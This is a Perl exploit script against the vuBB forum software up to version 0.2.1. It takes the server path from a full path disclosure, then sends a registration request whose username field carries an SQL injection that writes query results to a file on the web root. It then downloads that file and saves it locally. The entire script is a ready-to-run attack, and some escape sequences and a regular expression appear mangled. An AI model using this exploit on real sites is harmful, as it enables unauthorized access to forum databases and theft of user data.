#!/usr/bin/perl
#
# by DarkFig -- acid-root.new.fr
# French Advisory (vuBB <= 0.2.1 [BFA] SQL Injection, XSS, CRLF Injection, Full Path Disclosure): http://www.acid-root.new.fr/advisories/vubb021b.txt
#
use IO::Socket;
use LWP::Simple;
# Header
print "rn+---------------------------------------+", "rn";
print "| vuBB <= 0.2.1 [BFA] SQL Injection -|", "rn";
print "+---------------------------------------+", "rn";
# Usage
if(!$ARGV[2]){
print "| Usage: <host> <path> <username> ------|", "rn";
print "+---------------------------------------+", "rn";
exit;
}
# Host
if($ARGV[0] =~ /http://(.*)/){
$host = $1;
} else {
$host = $ARGV[0];
}
print "[+]Host: $hostrn";
# Var
my $path = $ARGV[1];
my $user = $ARGV[2]; print "[+]User: $userrn";
my $port = 80;
my $fpd = "http://".$host.$path."includes/vubb.php";
my $err1 = "[-]Can't connect to the hostrn";
my $err2 = "[-]Can't retrieve the full pathrn";
my $err3 = "[-]Can't retrieve the resultsrn";
my $poti = "POST "."$path"."index.php?act=register&action=register"." HTTP/1.1";
# Full Path Disclosure
$req0 = get($fpd) or die print $err1 and end();
if($req0 =~ /in <b>(.*)/includes/vubb.php</b>/) {
$fullpath = $1."/thisismypasswd.txt";
print "[+]Path: $1rn";
} else {
print $err2 and end();
}
# Malicious data
my $pdat = "user=$user"."%27+INTO+OUTFILE+%27"."$fullpath"."%27%23"."&email=a669c45
70f%40hotmail.com&vemail=a669c4570f%40hotmail.com&pass=mypassword&vpass=
mypassword&agreement=iacceptohackit&agree=on";
my $ldat = length $pdat;
my $req1 = IO::Socket::INET->new(
PeerAddr => $host,
PeerPort => $port,
Proto => "tcp"
) or print $err1 and end();
print $req1 "$poti", "rn";
print $req1 "Host: $host", "rn";
print $req1 "Content-Type: application/x-www-form-urlencoded", "rn";
print $req1 "Content-Length: $ldat", "rnn";
print $req1 "$pdat", "rn";
close($req1);
# Results
$req2 = get("http://".$host.$path."/thisismypasswd.txt") or print $err3 and end();
open(f, ">VUBB_RESULT.txt");
print f $req2;
close(f);
print "[+]Done: VUBB_RESULT.txtrn";
end();
# Bye
sub end {
print "+---------------------------------------+", "rn";
exit;
}